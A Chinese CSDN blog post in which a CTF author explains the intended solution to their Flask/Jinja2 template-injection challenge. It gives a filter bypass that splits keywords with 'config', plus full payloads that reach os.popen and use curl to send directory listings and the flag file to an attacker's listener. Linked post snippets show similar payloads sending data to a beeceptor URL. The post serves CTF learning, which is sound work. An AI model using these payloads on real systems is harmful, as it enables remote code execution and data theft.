SSTI注入,简单记录一下(config)

最新推荐文章于 2024-07-22 13:21:32 发布
最新推荐文章于 2024-07-22 13:21:32 发布
阅读量2.5k 收藏 2
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a3320315/article/details/104102979
版权

输入数据有回显,看返回头是python写的后台,猜测有SSTI(加了个php模式的报错和index.php路由不知道有没有骗到某个师傅–) 然后接下来是绕WAF,我写了两个过滤,一个强过滤是匹配{{和}},目的是想让各位师傅用远程SSTI把flag打到自己服务器上。

然后是一个简单的单词匹配过滤os等敏感字符,只要FUZZ一下,再实验一下,会找到config这个大多数poc都用不上且过滤排在较后,可以用来绕过过滤。

服务器监听 nc -lvp port

根目录查flag: {% iconfigf ''.__claconfigss__.__mconfigro__[2].__subclasconfigses__()[59].__init__.func_glconfigobals.linecconfigache.oconfigs.popconfigen('curl http://yourip:port/ -d ls / | grep flag;') %}1{% endiconfigf %}
读flag:
{% iconfigf ''.__claconfigss__.__mconfigro__[2].__subclasconfigses__()[59].__init__.func_glconfigobals.linecconfigache.oconfigs.popconfigen('curl http://yourip:port/ -d cat /flag_1s_Hera;') %}1{% endiconfigf %}

自己看到的较好的介绍链接~~
Python模板注入(SSTI)深入学习
Flask/Jinja2模板注入中的一些绕过姿势

另外值得关注的一些知识点~~
SSTI检测顺序
在这里插入图片描述github上的ssti(超级全面~~)

HyyMbb
关注
专栏目录
SSTI例题buu[Flask]SSTI
cuddlylm的博客
04-08 3267
方法一:手注 打开只有这个 访问http://your-ip/?name={{233233}},得到54289,说明它执行了我们的命令,SSTI漏洞存在。 这里的54289是233233的运算结果 获取eval函数并执行任意python代码的POC: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals_
班长出题 -- funpy (带源码):python反序列化 + ssti + SSRF + remote_addr路由绕过 + url中的#定位符
Zero_Adam的博客
03-11 1837
目录:第五题:一、自己做:二、不足&&学到的:三、学习WP:思路学习:1.绕过get_domain()2.绕过remote_addr() + \#3. 关于反序列化关于python反序列化方法一:exec的方法,(纯属为了复习opcode)方法二、一定有方法二的方法三:用这个变量覆盖的方法(后面的用的是这个方法):4. 接着做 python反序列化 + ssti 第五题: 一、自己做: 做了个der,,, 审计代码差远了, 二、不足&&学到的: 学习了python的反序列化
SSTI模版注入
Teemos的博客
06-02 1246
SSTI模版注入 文章目录SSTI模版注入1 SSTI服务器端模板注入2 模板引擎3 举例3.1 以python的flask为例4 绕过tips4.1 过滤[]等括号4.2 过滤了subclasses4.3 过滤class5 总结 1 SSTI服务器端模板注入 SSTI服务器端模板注入(Server-Side Template Injection),同SQL注入、XSS注入等,都是从用户获取一个输入,由于代码不规范或信任了用户输入,后端的渲染处理上进行了语句的拼接,而导致了服务端模板注入SSTI利用的是
SSTI模板注入
m0_52016680的博客
04-27 587
一、概念(废话) SSTI即(server-side template injection)服务器模板,平时我们常用的有sql注入,xss注入,xml注入和命令注入等等。大家应该都知道sql注入的原理以及方式,而模板注入的原理也很类似都是通过输入一些指令在后端处理进行了语句的拼接然后执行。模板注入不同的是它是针对python、php、java、nodejs、javascript或是ruby的网站处理框架。 二、模板引擎(摘自百度百科) 模板引擎不属于特定技术领域,它是跨领域跨平台的概念。在Asp下有模
CTF-SSTI模板注入
最新发布
2302_78903258的博客
07-22 1229
当前使用的一些框架,比如python的flask,php的tp,java的spring等一般都采用成熟的的MVC的模式,用户的输入先进入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。
SSTI注入——python中的ssti
wwwwyyyrre的博客
06-05 948
python里的运用最多的应该就是flask模板注入 也可以直接用tplmap自动化注入来找到ssti注入点python21.2.3.4.5.6.python31.2.
SSTI(模块注入)的简单学习
dbabs的博客
02-05 703
SSTI即服务端模版注入攻击。由于程序员代码编写不当,导致用户输入可以修改服务端模版的执行逻辑,从而造成XSS,任意文件读取,代码执行等一系列问题。
fask--SSTI模块注入
qq_43613772的博客
08-01 544
一些简单注入 {{config}}可以获取当前设置 {{self}} {{self.__dict__._TemplateReference__context.config}} 同样可以看到config __class__ 返回类型所属的对象 __subclasses__ 每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表 __init__ 类的初始化方法 __globals__ 对包含函数全局变量的字典的引用 __mro__ 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解
红队专题-Web安全/渗透测试-注入攻击
aming小老弟
10-27 180
Sql Inject(SQL注入)概述 哦,SQL注入漏洞,可怕的漏洞。在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞, 其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
Bugkuweb系列题记录
qq_51558360的博客
04-20 900
web1 打开场景,按F12查看源代码 web2 打开是一个计算器,但是只能输入一个数字。打开源码修改长度 输入结果就得flag web3 $what=$_GET['what']; echo $what; if($what=='flag') echo 'flag{****}'; web4 法一:hackbar传参 法二:构造表单 <form action="/post/" method="post"> <input type="text" name="what"> &l
攻防世界web解题[进阶](五)
weixin_46703850的博客
03-10 522
攻防世界web解题[进阶](五) 介绍:记录解题过程 15.Web_python_template_injection(python 模板注入) 16.Web_php_unserialize( php 反序列) 17.easytornado 18.shrine(flask模板注入)
ssti总结
m0_52432374的博客
09-18 2554
小学的时候拿别人的好词好句,套在我们自己的作文里,此时我们的作文就相当于模板,而别人的好词好句就相当于传递进模板的内容。那么什么是模板注入呢,当不正确的使用模板引擎进行渲染时,则会造成模板注入通俗点理解:拿到数据,塞到模板里,然后让渲染引擎将赛进去的东西生成 html 的文本,返回给浏览器,这样做的好处展示数据快,大大提升效率。
SSTI注入
ANYOUZHEN的博客
10-30 114
flask模板,config是模板中的一个全局对象,在url中写上?flag={{config.SECRET_KEY}}
关于SSTI注入的一些理解
weixin_44477223的博客
04-13 866
什么是SST 原理 利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。 用途 让(网站)程序实现界面与数据分离,业务代码与逻辑代码的分离,这就大大提升了开发效率,良好的设计也使得代码重用变得更加容易。 SSTI是什么 SSTI类似与sql注入,但是与sql有所不同的是,SSTI利用的事故网站的模板引擎,主要是网站处理框架。 Python的jinja2 ma
SSTI(模板注入)
xiaolong22333的博客
02-28 1523
概念性的东西这里就不讲了,毕竟像我这种刚开始学ssti,且没什么Python基础的小白来说,要是一上来就巴拉巴拉讲一堆概念,可能直接就懵了。 首先认识一下这个东西 __class__ 它可以用来查看变量所属的类 什么意思呢?动手试一下就知道了。用命令行打开python,输入''.__class__ 可以看到输出了<class 'str'>,表明这是str类,当然还有另外的类型,可以依次输入().__class__,[].__class__,{}.__class__ str(字符串)、di.
[GWCTF 2019]你的名字
shinygod的博客
04-15 888
知识点;ssti 参考: Python模板注入(SSTI)深入学习 wp 外带 {% iconfigf ''.__claconfigss__.__mconfigro__[2].__subclaconfigsses__()[59].__init__.func_glconfigobals.lineconfigcache.oconfigs.popconfigen('curl https://sfg56dsf.free.beeceptor.com/?i=`ls / |base64`') %}1{% endico
CTF SSTI 一些记录
3569
10-13 5851
https://ctftime.org/writeup/10895 https://www.xmsec.cc/ssti-and-bypass-sandbox-in-jinja2/   ▼▼▼Shrine(Web:solved 58/810=7.1%)▼▼▼ This writeup is written by @kazkiti_ctf GET / HTTP/1.1 Host: shri...
SSTI漏洞基础解析
weixin_43895765的博客
04-01 5553
🚩flask基础 flask是python编写的一个WEB应用程序框架,flask由Armin Ronacher带领的一个Pocco团队开发,flask基于werkzeug WSGI工具包个jinjia2模板引擎~ WSGI:Web Server Gateway Interface 即WEB服务器网关接口 🚩第一个flask程序 # 从flask中导入Flask,注意,flask是包名,Flask是模块名 from flask import Flask # 初始化Flask app = Flask(
SSTI注入语句总结
火柴人的博客
03-30 885
说明 所有测试环境都在python3.*环境完成。 0x00 获取基本类 首先通过str、dict、tuple或list获取python的基本类(当然也可以利用一些其他在jinja2中存在的对象,比如request): ‘’.class.mro[1] {}.class.bases[0] ().class.bases[0] [].class.bases[0] request.class.mro[1...
ssti模板注入payload
09-26
SSTI(服务器端模板注入)是指攻击者能够将恶意有效载荷注入到服务器端模板中,然后在服务器端执行该模板。攻击者利用模板引擎生成前端的HTML代码,通过将用户的数据放到渲染函数中来生成模板,最终将生成的HTML页面返回给浏览器。在SSTI攻击中,恶意注入的有效载荷可以是任意的模板代码,其目的是执行非法操作或者获取敏感信息。 关于SSTI模板注入的payload,这取决于模板引擎的类型和具体的注入点。不同的模板引擎可能具有不同的语法和功能,因此payload的编写也会有所差异。一般来说,payload可以包括以下内容: 1. 利用模板语法执行系统命令,例如使用`${{7*7}}`来执行简单的算术运算。 2. 通过访问对象的属性和方法来获取敏感信息,例如`{{config.items()}}`来获取应用程序的配置信息。 3. 利用模板语法实现循环、条件语句等控制流程,例如使用`{% for i in range(10) %}...{% endfor %}`来进行循环操作。 4. 调用模板引擎提供的特殊函数和过滤器,例如使用`{{7|safe}}`来禁用自动转义,或者使用`{{user.name|escape}}`来对用户输入进行转义。 请注意,在实际应用中进行SSTI攻击是非法的行为,我强烈建议您不要尝试。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值